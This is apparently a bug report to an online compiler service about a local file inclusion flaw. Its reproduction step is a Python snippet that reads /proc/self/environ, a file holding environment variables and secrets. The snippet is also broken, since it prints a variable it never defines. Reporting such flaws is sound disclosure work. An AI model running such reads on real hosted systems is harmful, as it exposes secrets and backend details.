Problem description:
Security issue identified while running code on the compiler aka Local File Inclusion (LFI)
Expected behavior:
‘permission denied’ should be the expected behavior as it exposes backend info and an adversary can run OS commands.
Actual behavior:
Displaying sensitive content
Steps to reproduce:
Run the below code and change the file name/path and the file contents will be displayed accordingly.
# Open the file in read mode
with open(‘/proc/self/environ’, ‘r’) as file:
# Print the contents of the file
print(contents)
Bug appears at this link:
Browser/OS/Device:
Chrome browser/Win 11